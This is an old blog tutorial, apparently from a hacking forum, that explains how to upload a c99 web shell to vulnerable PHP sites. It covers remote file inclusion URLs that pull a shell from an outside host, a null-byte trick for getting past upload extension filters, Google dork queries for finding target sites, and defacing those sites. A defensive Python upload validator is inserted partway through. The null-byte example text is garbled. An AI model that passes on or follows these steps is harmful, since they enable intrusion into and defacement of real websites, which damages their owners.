
Monday, 26 November 2012

[TuT] THE WAY TO UPLOAD SHELL ON VULNERABLE SITES [TuT]

The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without needing to upload it to take control over it. Read: RFI

A remote include works like this:

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever". The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing: "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php"

Get it?

(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)

Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions, uploading .php is almost impossible. With a Null Byte attack, though, it's made possible.

Now, let's take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try to upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get an error returned. If we add a Null Byte to that string, with an acceptable extension, we can bypass the extension check of the form. The Null Byte is represented in simple text form as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this: "C:\My Documents\shell.php.jpg"

(extra info: Most forms now prohibit the use of special characters such as %, #, @, *, $ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators and the like.)

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (Firefox add-on). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
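
The server-side re-check mentioned above (check the type again, assign the proper name), written from the site owner's side as an added example that is not part of the original post. It shows why a last-extension filter accepts a name containing a null byte and how a validator rejects it; the allowlist, function names and sample names are assumptions.

```python
import os
import secrets

# Assumed allowlist: permitted extension -> leading magic bytes of that format.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def naive_check(filename: str) -> bool:
    """The weak filter described in the post: look only at the last extension."""
    return os.path.splitext(filename)[1].lower() in ALLOWED


def c_string_view(filename: str) -> str:
    """What an API that treats NUL as end-of-string would see and store."""
    return filename.split("\x00", 1)[0]


def safe_upload_name(client_name: str, data: bytes) -> str:
    """Validate an upload and return a server-chosen storage name.

    Raises ValueError on rejection. The client-supplied name is only
    inspected, never used to build the stored path.
    """
    # Reject NUL and other control characters outright instead of stripping them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in client_name):
        raise ValueError("control character in filename")
    # Drop any client-supplied directory part (both separator styles).
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    # Check the extension again against the content, not just the name.
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # Assign the proper name: random stem plus the verified extension.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    sample = "shell.php\x00.jpg"  # constructed sample name
    print(naive_check(sample), repr(c_string_view(sample)))
```

Storing the returned name in a directory where the web server does not execute scripts keeps a file that slips through from being run.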

Everyone got it now?

If all things go according to plan, your shell shall be uploaded and you can now take control.

II) Defacing a Site using a c99 shell
---
Okay, first, what is defacing? Well, defacing is when you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving you're a good hacker. Okay, so let's get started.
First you need a c99 shell, which can be easily found on Google.
Your antivirus might think it's a virus but it isn't! Okay, now you will need to find exploitable sites. Here are some ways to find them.
Google Dork:
Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See, always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it won't change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt
